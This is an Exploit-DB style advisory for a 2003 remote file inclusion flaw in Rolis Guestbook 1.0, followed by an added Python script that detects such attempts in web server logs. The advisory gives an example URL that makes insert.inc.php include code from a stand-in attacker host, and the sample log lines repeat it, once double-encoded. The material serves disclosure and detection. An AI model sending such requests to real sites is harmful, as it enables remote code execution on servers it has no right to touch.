Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion

EDB-ID: 23384
CVE: N/A
Platform: PHP
Published: 2003-11-17

source: http://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code, which would then be executed on the vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue; however, other versions may be affected as well.

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/
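
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it scans web server access log lines for requests that hand a remote URL to a `.inc.php` include fragment, generalizing the `path` case to any query parameter and to repeated percent-encoding. The log lines are constructed, and the names `find_rfi_attempts` and `fully_decode` are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote URL scheme.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)
# Include fragments such as insert.inc.php are not meant to be requested directly.
INCLUDE_SCRIPT_RE = re.compile(r'\.inc\.php$', re.I)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253A -> %3A -> :)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines):
    """Return (script, parameter, value) per request passing a remote URL to an include fragment."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group("target"))
        if not INCLUDE_SCRIPT_RE.search(target.path):
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_URL_RE.match(value):
                hits.append((target.path, name, value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Nov/2003:10:00:01 +0000] "GET /rolis_book_path/index.php HTTP/1.0" 200 5120',
    '192.0.2.44 - - [17/Nov/2003:10:02:13 +0000] "GET /rolis_book_path/insert.inc.php?path=http://hacker.com/ HTTP/1.0" 200 312',
    '192.0.2.44 - - [17/Nov/2003:10:02:40 +0000] "GET /rolis_book_path/insert.inc.php?path=http%253A%252F%252Fhacker.com%252F HTTP/1.0" 200 312',
    '192.0.2.77 - - [17/Nov/2003:10:05:00 +0000] "GET /rolis_book_path/insert.inc.php?path=./ HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for script, name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible RFI: {script} parameter {name!r} = {value!r}")
```

Any direct request to an include fragment is already unusual, so a hit here is worth correlating with outbound connections from the web server at the same timestamp.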